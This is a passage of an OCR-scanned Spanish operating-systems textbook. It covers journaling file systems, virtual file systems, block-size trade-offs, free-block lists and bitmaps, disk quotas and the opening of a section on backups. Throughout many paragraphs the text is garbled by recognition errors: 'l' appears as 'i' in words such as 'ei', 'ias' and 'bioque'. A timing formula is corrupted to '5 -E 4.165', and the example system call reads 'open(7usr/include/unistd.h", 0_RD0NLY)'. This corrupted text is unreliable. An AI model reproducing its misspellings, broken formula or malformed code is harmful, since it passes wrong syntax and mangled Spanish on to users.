En Windows se requieren pasos similares. En la ausencia de fallas del sistema, el orden en el que 
se realizan estos pasos no importa: en la presencia de fallas, sí. Suponga que se completa el primer 
paso y después el sistema falla. El nodo-i y los bloques de archivo no estarán accesibles desde nin¬ 
gún archivo, pero tampoco estarán disponibles para ser reasignados: sólo se encuentran en alguna 
parte del limbo, disminuyendo los recursos disponibles. Si la falla ocurre después del siguiente pa¬ 
so, sólo se pierden los bloques. 

Si el orden de las operaciones se cambia y el nodo-i se libera primero, entonces después de re¬ 
arrancar, el nodo-i se puede reasignar pero la entrada de directorio anterior seguirá apuntando a él 
y por ende al archivo incorrecto. Si los bloques se liberan primero, entonces una falla antes de lim¬ 
piar el nodo-i indicará que una entrada de directorio válida apunta a un nodo-i que lista los bloques 
que ahora se encuentran en la reserva de almacenamiento libre y que probablemente se reutilicen 
en breve, produciendo dos o más archivos que compartan al azar los mismos bloques. Ninguno de 
estos resultados es bueno. 

Lo que hace el sistema de archivos por bitácora es escribir primero una entrada de registro que 
liste las tres acciones a completar. Después la entrada de registro se escribe en el disco (y como bue¬ 
na medida, posiblemente se lea otra vez del disco para verificar su integridad). Sólo hasta que se ha 
escrito la entrada de registro es cuando empiezan las diversas operaciones. Una vez que las opera¬ 
ciones se completan con éxito, se borra la entrada de registro. Si ahora el sistema falla, al momen- 
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to de recuperarse el sistema de archivos puede verificar ei registro para ver si había operaciones 
pendientes. De ser así, todas eiias se pueden voiver a ejecutar (múitipies veces, en caso defaiias re¬ 
petidas) hasta queei archivo se eiimineen forma correcta. 

Para que funcione ei sistema por bitácora, ias operaciones registradas deben ser Idem potentes, 
io cuai significa que pueden repetirse todas ias veces que sea necesario sin peiigro. Las operacio¬ 
nes como "Actuaiizar ei mapa de bits para marcar ei nodo-i k o ei bioque n como iibre" se pueden 
repetir hasta que ias todas ias operaciones se compieten sin peiigro. De manera simiiar, ias opera¬ 
ciones de buscar en un directorio y eiiminar una entrada iiamada foobar también son idempotentes. 
Por otro iado, ia operación de agregar ios bioques recién iiberados dei nodo-i K ai finai de ia iista 
iibre no es idempotente, debido a que éstos tai vez ya se encuentren ahí. La operación más costosa 
"Buscaren ia iista de bioques iibres y agregad eei bioque n si no está ya presente", también es idem¬ 
potente. Los sistemas de archivos por bitácora tienen que organizar sus estructuras de datos y opera¬ 
ciones que pueden registrarse, de manera que todas eiias sean idempotentes. Bajo estas condiciones, 
i a recuperación de errores puede ser rápida y segura. 

Para una mayor confiabiiidad, un sistema de archivos puede introducir ei concepto de ias bases 
de datos conocido como transacción atómica. Cuando se utiiiza este concepto, varias acciones se 
pueden agrupar mediante ias operaciones begin transaction y end transaction. Así, ei sistema de 
archivos sabe que debe compietar todas ias operaciones agrupadas o ninguna de eiias, pero ninguna 
otra combinación. 

NTFS tiene un sistema por bitácora extenso y su estructura rara vez se corrompe debido a ias 
faiias en ei sistema. Ha estado en desarroiio desde ia primera vez que se iiberó con Windows NT 
en 1993. Ei primer sistema de archivos por bitácora de Linux fue ReiserFS, pero su popuiaridad se 
vio impedida por ei hecho de que era incompatibie con ei sistema de archivos ext2, que entonces 
era ei estándar. En contraste, ext3, que es un proyecto menos ambicioso que ReiserFS, también se 
hace por bitácora, ai tiempo que mantiene ia compatibiiidad con ei sistema ext2 anterior. 


4.3.7 Sistemas de archivos virtuales 

Hay muchos sistemas de archivos distintos en uso, a menudo en ia misma computadora, inciuso pa¬ 
ra ei mismo sistema operativo. Un sistema Windows puede tener un sistema de archivos NTFS prin- 
cipai, pero también una unidad o partición, FAT-32 o FAT-16, heredada que contenga datos 
antiguos, pero aún necesarios y de vez en cuando también se puede requerir un CD-ROM o DVD 
(cada uno con su propio sistema de archivos). Para manejar estos sistemas de archivos dispares, 
Windows identifica a cada uno con una ietra de unidad distinta, como en C:, D:, etcétera. Cuando 
un proceso abre un archivo, ia ietra deia unidad está presente en forma expiícita o, impiícita de ma¬ 
nera que Windows sepa a cuái sistema de archivos debe pasar ia soiicitud. No hay un intento por 
integrar sistemas de archivos heterogéneos en un todo unificado. 

En contraste, todos ios sistemas UNIX modernos tratan con mucha seriedad de integrar varios 
sistemas de archivos en una soia estructura. Un sistema Linux podría tener a ext2 como ei sistema 
de archivos raíz, con una partición ext3 montada en /usr y un segundo disco duro con un sistema de 
archivos ReiserFS montado en /home, así como un CD-ROM ISO 9660 montado temporalmente en 
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/mnt. Desde el punto de vista del usuario, hay una sola jerarquía de sistemas de archivos. Lo que 
sucede al abarcar múltiples sistemas de archivos (incompatibles) no es visible para los usuarios o 
procesos. 

Sin embargo, la presencia de múltiples sistemas de archivos está muy visible definitivamente 
para la implementación y desde el trabajo encabezado por Sun M icrosystems (Kleiman, 1986), la 
mayoría délos sistemas UNIX han utilizado el concepto de VFS (virtual file system. Sistema de ar¬ 
chivos virtual) para tratar de integrar múltiples sistemas de archivos en una estructura ordenada. La 
idea clave es abstraer la parte del sistema de archivos que es común para todos los sistemas de ar¬ 
chivos y poner ese código en una capa separada que llame a los sistemas de archivos concretos sub¬ 
yacentes para administrar los datos. La estructura general se ilustra en la figura 4-18. El siguiente 
análisis no es específico para Linux o FreeBSD, ni cualquier otra versión de UNIX, sino que pro¬ 
porciona un panorama general acerca de cómo funcionan los sistemas de archivos virtuales en los 
sistemas UNIX. 



Todas las llamadas al sistema relacionadas con archivos se dirigen al sistema de archivos vir¬ 
tual para su procesamiento inicial. Estas llamadas, que provienen de procesos de usuario, son las 
llamadas de POSIX estándar tales como open, read, write, Iseek, etcétera. Por ende, el VFS tiene 
una interfaz "superior" para los procesos de usuario y es la muy conocida interfaz de POSIX. 

El VFS también tiene una interfaz "inferior" para los sistemas de archivos concretos, etiqueta¬ 
da como Interfaz deVFS en la figura 4-18. Esta interfaz consiste de varias docenas de llamadas a 
funciones que el V F S puede hacer a cada sistema de archivos para real izar el trabajo. A sí, para crear 
un nuevo sistema de archivos que trabaje con el VFS, los diseñadores del nuevo sistema de archi¬ 
vos se deben asegurar que suminístrelas llamadas a funciones que requiere el VFS. Un ejemplo ob¬ 
vio de dicha función es una que lee un bloque específico del disco, lo coloca en la caché de búfer 
del sistema de archivos y devuelve un apuntador a ese bloque. En consecuencia, el VFS tiene dos 
interfaces distintas: la superior para los procesos de usuario y la inferior para los sistemas de archi¬ 
vos concretos. 

Aunque la mayoría de los sistemas bajo el VFS representan particiones en un disco local, éste no 
es siempre el caso. De hecho, la motivación original de Sun para construir el VFS era dar soporte a 
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los sistemas de archivos remotos mediante ei uso dei protocoio NFS (NetWork Fiie System, Sistema 
de archivos de red).Ei diseño dei VES es tai que mientras ei sistema de archivos concreto suministre 
ias funciones que requiere ei V FS, éste no sabe ni se preocupa por saber en dónde se aimacenan ios 
datos o como cuái es ei sistema de archivos subyacente. 

En ei interior, ia mayoría de ias impiementaciones de V FS son en esencia orientadas a objetos, 
aun si están escritas en C, en vez de C + + . Hay varios tipos ciave de objetos que se soportan nor- 
maimente. Éstos inciuyen ei superbioque (que describe a un sistema de archivos), ei nodo-v (que 
describe a un archivo) y ei directorio (que describe a un directorio dei sistema de archivos). Cada 
uno de éstos tiene operaciones (métodos) asociadas que deben soportar ios sistemas de archivos 
concretos. Además, ei VFS tiene ciertas estructuras de datos internas para su propio uso, incioyen¬ 
do ia tabia de montaje y un arregio de descriptores de archivos para iievar ia cuenta de todos ios ar¬ 
chivos abiertos en ios procesos de usuario. 

Para comprender cómo funciona ei VFS, veamos un ejempio en forma cronoiógica. Cuando 
se arranca ei sistema, ei sistema de archivos raíz se registra con ei VFS. Además, cuando se mon¬ 
tan otros sistemas de archivos (ya sea en tiempo de arranque o durante ia operación), éstos tam¬ 
bién se deben registrar con ei VFS. Cuando un sistema de archivos se registra, i o que hace 
básicamente es proveer una iista de ias direcciones de ias funciones que requiere ia VFS, ya sea 
como un vector (tabia) de ñamadas extenso o como varios de eiios, uno por cada objeto VFS, se¬ 
gún io demande ei V FS. Así, una vez que se ha registrado un sistema de archivos con ei V FS, és¬ 
te sabe cómo ieer un bioque de ese sistema, por ejempio: simpiemente iiama a ia cuarta (o 
cuaiquier otra) función en ei vector suministrado por ei sistema de archivos. De manera simiiar, ei 
VFS sabe entonces también cómo iievar a cabo cada una de ias demás funciones que debe sumi¬ 
nistrar ei sistema de archivos concreto: sóio iiama a ia función cuya dirección se suministró cuan¬ 
do se registró ei sistema de archivos. 

Una vez que se ha montado un sistema de archivos, se puede utiiizar. Por ejempio, si se ha 
montado un sistema de archivos en /usr y un proceso reaiiza ia ñamada 

open(7usr/include/unistd.h", 0_RD0NLY) 

ai anaiizar sintácticamente ia ruta, ei VFS ve que se ha montado un nuevo sistema de archivos en 
/usr y iocaiiza su superbioque, para io cuai busca en ia iista de superbioques de ios sistemas de ar¬ 
chivos montados. Habiendo reaiizado esto, puede encontrar ei directorio raíz dei sistema de archi¬ 
vos montado y buscar ia ruta inciude/unistd.h ahí. Entonces, ei VFS crea un nodo-v y hace una 
ñamada ai sistema de archivos concreto para que devueiva toda ia información en ei nodo-i dei ar¬ 
chivo. Esta información se copia ai nodo-v (en RAM ) junto con otra información, siendo ia más im¬ 
portante ei apuntador a ia tabia de funciones a ñamar para ias operaciones con ios nodos-v, como 
read, write, cióse, etcétera. 

Una vez que se ha creado ei nodo-v, ei VFS crea una entrada en ia tabia de descriptores de ar¬ 
chivos para ei proceso que está haciendo ia ñamada y ia estabiece para que apunte ai nuevo nodo- 
V (para ios puristas, ei descriptor de archivo en reaiidad apunta a otra estructura de datos que 
contiene ia posición actuai en ei archivo y un apuntador ai nodo-v, pero este detaiie no es importan¬ 
te para nuestros propósitos aquí). Por úitimo, ei VFS devueiveei descriptor de archivo ai ñamador, 
de manera que io pueda utiiizar para ieer, escribir y cerrar ei archivo. 
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Posteriormente, cuando el proceso realiza una operación read utilizando el descriptor de archi¬ 
vo, el VES localiza el nodo-v del proceso y las tablas de descriptores de archivos, siguiendo el apun¬ 
tador hasta la tabla de funciones, todas las cuales son direcciones dentro del sistema de archivos 
concreto en el que reside el archivo solicitado. La función que maneja a read se llama ahora y el 
código dentro del sistema de archivos concreto obtiene el bloque solicitado. El VES no tiene idea 
acerca de si los datos provienen del disco local, de un sistema de archivos remoto a través de la red, 
un CD-ROM , una memoria USB o de algo distinto. Las estructuras de datos involucradas se mues¬ 
tran en la figura 4-19. Empezando con el número de proceso del llamador y el descriptor de archi¬ 
vo, se localizan en forma sucesiva el nodo-v, el apuntador de la función read y la función de acceso 
dentro del sistema de archivos concreto. 



Figura 4-19. U na vista simplificada de las estructuras de datos y el código utilizados 
por el VES y el sistema de archivos concreto para realizar una read. 


De esta forma, es relativamente directo agregar nuevos sistemas de archivos. Para hacer uno, 
los diseñadores primero obtienen una lista de llamadas a funciones que espera el VES y después es¬ 
criben su sistema de archivos para proveer todas. De manera alternativa, si el sistema de archivos 
ya existe, entonces tienen que proveer funciones de envoltura que hagan lo que el VES necesita, por 
lo general realizando una o más llamadas nativas al sistema de archivos concreto. 
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4.4 ADMINISTRACIÓN Y OPTIMIZACIÓN 
DE SISTEMAS DE ARCHIVOS 

H acer que el sistema de archivos funcione es una cosa; hacerio que funcione de manera eficiente y 
robusta en ia vida reai esaigo muy distinto. En ias siguientes secciones anaiizaremosaigunas de ias 
cuestiones invoiucradas en ia administración de discos. 

4.4.1 Administración del espacio en disco 

Por io generai ios archivos se aimacenan en disco, así que ia administración dei espacio en disco es 
una cuestión importante para ios diseñadores de sistemas de archivos. Hay dos estrategias generaies 
posibies para aimacenar un archivo de n bytes: se asignan n bytes consecutivos de espacio en disco 
o ei archivo sedivideen varios bioques (no necesariamente) contiguos. La misma concesión está pre¬ 
sente en ios sistemas de administración de memoria, entre ia segmentación pura y ia paginación. 

Como hemos visto, aimacenar un archivo como una secuencia contigua de bytes tiene ei pro- 
biema obvio de que si un archivo crece, probabiemente tendrá que moverse en ei disco. Ei mismo 
probiema se apiica a ios segmentos en memoria, excepto que ia operación de mover un segmento 
en memoria es rápida, en comparación con ia operación de mover un archivo de una posición en ei 
disco a otra. Por esta razón, casi todos ios sistemas de archivos dividen ios archivos en bioques de 
tamaño fijo que no necesitan ser adyacentes. 

Tamaño de bloque 

Una vez que se ha decidido aimacenar archivos en bioques de tamaño fijo, surge ia pregunta acer¬ 
ca de qué tan grande debe ser ei bioque. Dada ia forma en que están organizados ios discos, ei sec¬ 
tor, ia pista y ei ciiindro son candidatos obvios para ia unidad de asignación (aunque todos eiios son 
dependientes dei dispositivo, io cuai es una desventaja). En un sistema de paginación, ei tamaño de 
ia página también es uno de ios principaies contendientes. 

Tener un tamaño de bioque grande significa que cada archivo (inciuso un archivo de 1 byte) 
ocupa un ciiindro compieto. También significa que ios pequeños archivos desperdician una gran 
cantidad de espacio en disco. Por otro iado, un tamaño de bioque pequeño significa que ia mayoría 
de ios archivos abarcarán varios bioques y por ende, necesitan varias búsquedas y retrasos rotacio- 
naies para ieerios, io cuai reduce ei rendimiento. Por ende, si ia unidad de asignación es demasiado 
grande, desperdiciamos espacio: si es demasiado pequeña, desperdiciamos tiempo. 

Para hacer una buena eiección hay que tener cierta información sobre ia distribución de ios ta¬ 
maños de archivo. Tanenbaum y coiaboradores (2006) estudiaron ia distribución de ios tamaños de 
archivo en ei Departamento de Ciencias Computacionaies de una gran universidad de investigación 
(ia V U) en 1984 y después en ei 2005, así como en un servidor Web comerciai que hospedaba a un 
sitio Web poiítico (www.eiectorai-vote.com). Los resuitados se muestran en ia figura 4-20, donde 
para cada tamaño de archivo de una potencia de dos, se iista ei porcentaje de todos ios archivos me¬ 
nores o iguaies a éste para cada uno de ios tres conjuntos de datos. Por ejempio, en ei 2005 ei 
59.13% de todos ios archivos en ia V U eran de 4 K B o menores y ei 90.84% de todos ios archivos 
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Figura 4-20. Porcentaje de archivos menores que un tamaño dado (en bytes). 

eran de 64 KB o menores. El tamaño de archivo promedio era de 2475 bytes. Tal vez a algunas per¬ 
sonas este tamaño tan pequeño les parezca sorprendente. 

¿Oué conclusiones podemos obtener de estos datos? Por una parte, con un tamaño de bloque 
de 1 KB sólo entre 30 y 50% de todos los archivos caben en un solo bloque, mientras que con un 
bloque de 4 K B, el porcentaje de archivos que caben en un bloque aumenta hasta el rango entre 60 
y 70%. Los demás datos en el artículo muestran que con un bloque de 4 KB, 93% de los bloques 
de disco son utilizados por 10% de los archivos más grandes. Esto significa que el desperdicio de 
espacio al final de cada pequeño archivo no es muy importante, debido a que el disco se llena por una 
gran cantidad de archivos grandes (videos) y la cantidad total de espacio ocupado por los pequeños 
archivos es insignificante. Incluso si se duplica el espacio que 90% de los archivos más pequeños ocu¬ 
parían, sería insignificante. 

Por otro lado, utilizar un bloque pequeño significa que cada archivo consistirá de muchos blo¬ 
ques. Para leer cada bloque normalmente se requiere una búsqueda y un retraso rotacional, por lo que 
la acción de leer un archivo que consista de muchos bloques pequeños será lenta. 

Como ejemplo, considere un disco con 1 M B por pista, un tiempo de rotación de 8.33 mseg y 
un tiempo de búsqueda promedio de 5 mseg. El tiempo en milisegundos para leer un bloque de k 
bytes es entonces la suma de los tiempos de búsqueda, de retraso rotacional y de transferencia: 

5 -E 4.165 + (k/1000000) x 8.33 

La curva sólida de la figura 4-21 muestra la velocidad de los datos para dicho disco como una fun¬ 
ción del tamaño de bloque. Para calcular la eficiencia del espacio, necesitamos hacer una suposición 
acerca del tamaño de archivo promedio. Por simplicidad, vamos a suponer que todos los archivos son 
de 4 K B. A unque este número es un poco más grande que los datos medidos en la V U, es probable 
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que los estudiantes tengan más archivos pequeños de ios que estarían presentes en un centro de da¬ 
tos corporativo, por io que podría ser una mejor aproximación en generai. La curva punteada de ia 
figura 4-21 muestra ia eficiencia dei espacio como una función dei tamaño de bioque. 



Figura 4-21. La curva sólida (escala del lado izquierdo) da la velocidad de datos del 
disco. La curva punteada (escala del lado derecho) da la eficiencia del espacio de dis¬ 
co. Todos los archivos son de4 KB. 

Las dos curvas se pueden comprender de ia siguiente manera. Ei tiempo de acceso para un bio¬ 
que está compietamente dominado por ei tiempo de búsqueda y ei retraso rotacionai, dado que se van 
a requerir 9 mseg para acceder a un bioque, entre más datos se obtengan será mejor. En consecuen¬ 
cia, ia veiocidad de datos aumenta casi en forma iineai con ei tamaño de bioque (hasta que ias trans¬ 
ferencias tardan tanto que ei tiempo de transferencia empieza a ser importante). 

A hora considere ia eficiencia dei espacio. Con archivos de 4 K B y bioques de 1KB,2KB o 
4 KB, ios archivos utiiizan ei 4, 2 y 1 bioques, respectivamente, sin desperdicio. Con un bioque 
de 8 KB y archivos de4 KB, ia eficiencia dei espacio disminuye hasta ei 50% y con un bioque de 
16 KB disminuye hasta 25%. En reaiidad, pocos archivos son un múitipio exacto dei tamaño 
de bioque dei disco, por io que siempre se desperdicia espacio en ei úitimo bioque de un archivo. 

Sin embargo, io que muestran ias curvas es que ei rendimiento y ei uso dei espacio se encuentran 
inherentemente en confiicto. Los bioques pequeños son maios para ei rendimiento pero buenos para ei 
uso dei espacio en ei disco. Para estos datos no hay un compromiso razonabie disponibie. Ei tamaño 
más cercano ai punto en ei que se cruzan ias dos curvas es 64 K B, pero ia veiocidad de datos es de só- 
io 6.6 M B/seg y i a eficiencia dei espacio es de aproximadamente 7%; ninguno de estos dos vaiores son 
buenos. H istóricamente, ios sistemas de archivos han eiegido tamaños en ei rango de 1 K B a 4 K B, pe¬ 
ro con discos que ahora exceden a 1 TB, podría ser mejor incrementar ei tamaño de bioque a 
64 K B y aceptar ei espacio en disco desperdiciado. Ei espacio en disco ya no escasea en estos días. 

En un experimento por ver si ei uso de archivos en Windows NT era muy distinto ai de UNIX, 
VogeIs hizo mediciones en ios archivos de ia universidad Corneii University (Vogeis, 1999). Éi 
observó que ei uso de archivos en NT es más compiicado queen UNIX. Escribió io siguiente: 

Cuando escribimos unos cuantos caracteres en ei editor de texto bioc de notas (notepad), ai 
guardar esto a un archivo se activarán 26 ñamadas ai sistema, inciuyendo 3 intentos de aper¬ 
tura faiiidos, 1 sobrescritura de archivo y 4 secuencias adicionaies de abrir y cerrar. 
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Sin embargo, observó un tamaño promedio (ponderado por uso) de archivos sóio ieídos de 1 KB, 
de archivos sóio escritos de 2.3 KB y de archivos ieídos y escritos de 4.2 KB. Dadas ias distintas 
técnicas de medición de ios conjuntos de datos y ei año, estos resuitados son sin duda compatibies 
con ios resuitados de ia VU. 

Registro de bloques libres 

Una vez que se ha eiegido un tamaño de bioque, ia siguiente cuestión es cómo iievar registro de ios 
bioques iibres. Hay dos métodos utiiizados ampiiamente, como se muestra en ia figura 4-22. Ei pri¬ 
mero consiste en utiiizar una iista eniazada de bioques de disco, donde cada bioque contiene tantos 
números de bioques de disco iibres como pueda. Con un bioque de 1 KB y un número de bioque de 
disco de 32 bits, cada bioque en ia iista de bioques iibres contiene ios números de 255 bioques iibres 
(se requiere una ranura para ei apuntador ai siguiente bioque). Considere un disco de 500 GB, que 
tiene aproximadamente 488 miñones de bioques de disco. Para aimacenar todas estas direcciones a 
255 por bioque, se requiere una cantidad aproximada de 1.9 miñones de bioques. En generai se uti- 
iizan bioques iibres para mantener ia iista de bioques iibres, por io que en esencia ei aimacenamien- 
to es gratuito. 


Bloques de disco libres: 16,17, 18 


Un bloque de disco de 1 KB puede contener 
256 números de bloque de disco de 32 bits 
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Figura 4-22. (a) Almacenamiento de la lista de bloques libres en una lista enlazada, 
(b) Un mapa de bits. 


La otra técnica de administración dei espacio iibreesei mapa de bits. Un disco con n bioques re¬ 
quiere un mapa de bits con n bits. Los bioques iibres se representan mediante Is en ei mapa, ios bio¬ 
ques asignados mediante Os (o viceversa). Para nuestro disco de 500 GB de ejempio, necesitamos 
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488 millones de bits para el mapa, que requieren poco menos de 60,000 bloques de 1 KB para su al¬ 
macenamiento. No es sorpresa que el mapa de bits requiera menos espacio, ya que utiliza 1 bit por 
bloque, en comparación con 32 bits en el modelo de la lista enlazada. Sólo si el disco está casi lleno 
(es decir, que tenga pocos bloques libres) es cuando el esquema de la lista enlazada requiere menos 
bloques que el mapa de bits. 

Si los bloques libres tienden a presentarse en series largas de bloques consecutivos, el sistema 
de la lista de bloques libres se puede modificar para llevar la cuenta de las series de bloques, en vez de 
bloques individuales. U na cuenta de 8,16 o 32 bits se podría asociar con cada bloque dando el nú¬ 
mero de bloques libres consecutivos. En el mejor caso, un disco prácticamente vacío podría repre¬ 
sentarse mediante dos números: la dirección del primer bloque libre seguida de la cuenta de bloques 
libres. Por otro lado, si el disco se fragmenta demasiado, es menos eficiente llevar el registro de las 
series que de los bloques individuales, debido a que no sólo se debe almacenar la dirección, sino 
también la cuenta. 

Esta cuestión ilustra un problema con el que los diseñadores de sistemas operativos se enfrentan 
a menudo. Hay varias estructuras de datos y algoritmos que se pueden utilizar para resolver un pro¬ 
blema, pero para elegir el mejor se requieren datos que los diseñadores no tienen y no tendrán sino 
hasta que el sistema se opere y se utilice con frecuencia. E incluso entonces, tal vez los datos no es¬ 
tén disponibles. Por ejemplo, nuestras propias medí clones de los tamaños de archivo en laVU en 1984 
y 1995, los datos del sitio Web y los datos de Cornell son sólo cuatro muestras. Aunque es mejor que 
nada, tenemos una idea muy vaga acerca de si también son representativos de las computadoras do¬ 
mésticas, las computadoras empresariales, las computadoras gubernamentales y otras. Con algo de es¬ 
fuerzo podríamos haber obtenido un par de muestras de otros tipos de computadoras, pero incluso así 
sería imprudente extrapolar a todas las computadoras de los tipos que se midieron. 

Regresando por un momento al método de la lista de bloques libres, sólo hay que mantener un 
bloque de apuntadores en la memoria principal. Al crear un archivo, los bloques necesarios se toman 
del bloque de apuntadores. Cuando este bloque se agota, se lee un nuevo bloque de apuntadores del 
disco. De manera similar, cuando se elimina un archivo se liberan sus bloques y se agregan al blo¬ 
que de apuntadores en la memoria principal. Cuando este bloque se llena, se escribe en el disco. 

Bajo ciertas circunstancias, este método produce operaciones de E/S de disco innecesarias. 
Considere la situación de la figura 4-23(a), donde el bloque de apuntadores en memoria tiene espa¬ 
cio para sólo dos entradas más. Si se libera un archivo de tres bloques, el bloque de apuntadores se 
desborda y tiene que escribirse en el disco, con lo cual se produce la situación de la figura 4.23(b). 
Si ahora se escribe un archivo de tres bloques, se tiene que volver a leer el bloque completo de apun¬ 
tadores del disco, lo cual nos regresa a la figura 4-23(a). Si el archivo de tres bloques que se acaba 
de escribir era temporal, al liberarlo se necesitará otra escritura de disco para escribir el bloque com¬ 
pleto de apuntadores devuelta en el disco. En resumen, cuando el bloque de apuntadores está casi 
vacío, una serie de archivos temporales de un tiempo corto de vida puede producir muchas opera¬ 
ciones de E/S de disco. 

Un método alternativo que evita la mayor parte de estas operaciones de E/S de disco es dividir el 
bloque completo de apuntadores. Así, en vez de pasar de la figura 4-23(a) a la figura 4-23(b), pasa¬ 
mos de la figura 4-23(a) a la figura 4-23(c) cuando se liberan tres bloques. A hora el sistema puede ma¬ 
nejar una serie de archivos temporales sin realizar ninguna operación de E/S. Si el bloqueen memoria 
se llena, se escribe en el disco y se lee el bloque medio lleno del disco. La idea aquí es mantener la 
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(a) (b) (c) 


Figura 4-23. (a) Un bloque casi lleno de apuntadoras a bloques de disco libres en la 
memoria y tres bloques de apuntadores en el disco, (b) Resultado de liberar un archi¬ 
vo de tres bloques, (c) U na estrategia alternativa para manejar los tres bloques libres. 
Las entradas sombreadas representan apuntadores a bloques de disco libres. 


mayor parte de los bloques de apuntadores en el disco llenos (para minimizar el uso del disco), pe¬ 
ro mantener el que está en memoria lleno a la mitad, para que pueda manejar tanto la creación como 
la remoción de archivos sin necesidad de operaciones de E/S de disco en la lista de bloques libres. 

Con un mapa de bits también es posible mantener sólo un bloque en memoria, usando el disco 
para obtener otro sólo cuando el primero se llena o se vacía. Un beneficio adicional de este método 
es que al realizar toda la asignación de un solo bloque del mapa de bits, los bloques de disco estarán 
cerca uno del otro, con lo cual se minimiza el movimiento del brazo del disco. Como el mapa de bits 
es una estructura de datos de tamaño fijo, si el kernel está paginado (parcialmente), el mapa de 
bits puede colocarse en memoria virtual y hacer que se paginen sus páginas según se requiera. 

C uotas de disco 

Para evitar que los usuarios ocupen demasiado espacio en disco, los sistemas operativos multiusua- 
rio proporcionan un mecanismo para imponer las cuotas de disco. La idea es que el administrador 
del sistema asigne a cada usuario una cantidad máxima de archivos y bloques y que el sistema ope¬ 
rativo se asegure de que los usuarios no excedan sus cuotas. A continuación describiremos un me¬ 
canismo común. 

Cuando un usuario abre un archivo, los atributos y las direcciones de disco se localizan y seco- 
locan en una tabla de archivos abiertos en la memoria principal. Entre los atributos hay una entra¬ 
da que indica quién es el propietario. Cualquier aumento en el tamaño del archivo se tomará de la 
cuota del propietario. 

Una segunda tabla contiene el registro de cuotas para cada usuario con un archivo actualmen¬ 
te abierto, aun si el archivo fue abierto por alguien más. Esta tabla se muestra en la figura 4-24. Es 
un extracto de un archivo de cuotas en el disco para los usurarios cuyos archivos están actualmen¬ 
te abiertos. Cuando todos los archivos se cierran, el registro se escribe de vuelta en el archivo de 
cuotas. 
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Tabla de archivos abiertos 


Atributos 

direcciones de disco 
Usuario = 8 


Tabla de cuotas 



Límite de bloques suave 


Límite de bloques duro 


Número actual de bloques 


Número de advertencias 
de bloques pendientes 


Límite de archivos suave 


Límite de archivos duro 


Número actual de archivos 


Número de advertencias 
de archivos pendientes 


Registro de 
)>cuotas para 
el usuario 8 


Figura 4-24. El registro de cuotas se lleva en una tabla de cuotas, usuario por usuario. 


Cuando se crea una nueva entrada en la tabla de archivos abiertos, se introduce en ella un apun¬ 
tador al registro de cuotas del propietario, para facilitar la búsqueda de los diversos límites. Cada 
vez que se agrega un bloque a un archivo se incrementa el número total de bloques que se cargan 
al propietario y se realiza una verificación con los límites duro y suave. Se puede exceder el límite 
suave, pero el límite duro no. Un intento de agregar datos a un archivo cuando se ha llegado al lí¬ 
mite de bloques duro producirá un error. También existen verificaciones similares para el número 
de archivos. 

Cuando un usuario trata de iniciar sesión, el sistema examina el archivo de cuotas para ver si 
el usuario ha excedido el límite suave para el número de archivos o el número de bloques de disco. 
Si se ha violado uno de los límites, se muestra una advertencia y la cuenta de advertencias restan¬ 
tes se reduce en uno. Si la cuenta llega a cero en algún momento, el usuario ha ignorado demasia¬ 
das veces la advertencia y no se le permite iniciar sesión. Para obtener permiso de iniciar sesión otra 
vez tendrá que hablar con el administrador del sistema. 

Este método tiene la propiedad de que los usuarios pueden sobrepasar sus límites suaves du¬ 
rante una sesión, siempre y cuando eliminen el exceso cuando cierren su sesión. Los límites duros 
nunca se pueden exceder. 

4.4.2 Respaldos del sistema de archivos 

La destrucción de un sistema de archivos es a menudo un desastre aún mayor que la destrucción de 
una computadora. Si una computadora se destruye debido a un incendio, tormentas eléctricas o 
si se derrama una taza de café en el teclado, es molesto y costará dinero, pero en general se puede 
comprar un reemplazo sin muchos problemas. Las computadoras personales económicas se pueden 
reemplazar incluso en un lapso no mayor a una hora, con sólo ir a una tienda de computadoras 
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(excepto en las universidades, donde para emitir una orden de compra se requieren tres comités, cin¬ 
co firmas y 90 días). 

Si ei sistema de archivos de una computadora se pierde de manera irrevocabie, ya sea debido a 
hardware o software, será difícii restaurar toda ia información, iievará mucho tiempo y en muchos ca¬ 
sos, podrá ser imposibie. Para ias personas cuyos programas, documentos, registros fiscaies, archivos 
de Chentes, bases de datos, pianesdecomerciaiización o demás datos se pierden para siempre, ias con¬ 
secuencias pueden ser catastróficas. A unque ei sistema de archivos no puede ofrecer protección contra 
ia destrucción física dei equipo y ios medios, sí puede ayudar a proteger ia información. Es muy sim- 
pie: reaiizar respaidos. Pero eso no están sencido como parece. Demos un vistazo. 

La mayoría de ias personas no creen que reaiizar respaidos de sus archivos vaiga ia pena en 
cuanto ai tiempo y esfuerzo: hasta que un día su disco duro deja de funcionar en forma repentina, 
momento en ei cuai ia mayoría de esas personas cambian de opinión demasiado tarde. Sin embar¬ 
go, ias empresas (por io generai) comprenden bien ei vaior de sus datos y en generai reaiizan un 
respaido por io menos una vez ai día, casi siempre en cinta. Las cintas modernas contienen cientos 
de gigabytes a un costo de varios centavos por gigabyte. Sin embargo, reaiizar respaidos no es tan 
triviai como se oye, por io que a continuación anaiizaremos aigunas de ias cuestiones reiacionadas. 

Por io generai se reaiizan respaidos en cinta para manejar uno de dos probiemas potenciaies: 

1. Recuperarse de un desastre. 

2. Recuperarse de ia estupidez. 

Ei primer probiema trata acerca de cómo hacer que ia computadora vueiva a funcionar después de 
una faiia generai en ei disco, un incendio, una inundación o cuaiquier otra catástrofe naturai. En ia 
práctica estas cosas no ocurren muy a menudo, razón por ia cuai muchas personas no se preocupan 
por reaiizar respaidos. Estas personas además tienden a no tener seguros contra incendiasen sus ho¬ 
gares por ia misma razón. 

La segunda razón es que a menudo ios usuarios remueven de manera accidentai archivos, que 
más tarde vueiven a necesitar. Este probiema ocurre con tanta frecuencia que cuando se "eiimina" 
un archivo en Windows, no se eiimina dei todo, sino quesóio se mueve a un directorio especiai, co¬ 
nocido como Papelera de reciclaje, para que pueda restaurarse con faciiidad en un momento pos¬ 
terior. Los respaidos iievan este principio más aiiá y permiten que ios archivos que se removieron 
hace días, o inciuso semanas, se restauren desde ias cintas de respaido antiguas. 

Para reaiizar un respaido se requiere mucho tiempo y se ocupa una gran cantidad de espacio, 
por io que es importante hacerio con eficiencia y conveniencia. Estas consideraciones dan pie a ias 
siguientes cuestiones. En primer iugar, ¿debe respaidarseei sistema compieto o sóio parte de éi? En 
muchas instaiaciones, ios programas ejecutabies (binarios) se mantienen en una parte iimitada dei 
árboi dei sistema de archivos. No es necesario respaidar esos archivos si pueden voiver a instaiar- 
se de ios CD-ROM de ios fabricantes. Además, ia mayoría de ios sistemas tienen un directorio pa¬ 
ra ios archivos temporaies. Por io generai no hay razón para respaidarios tampoco. En UNIX, todos 
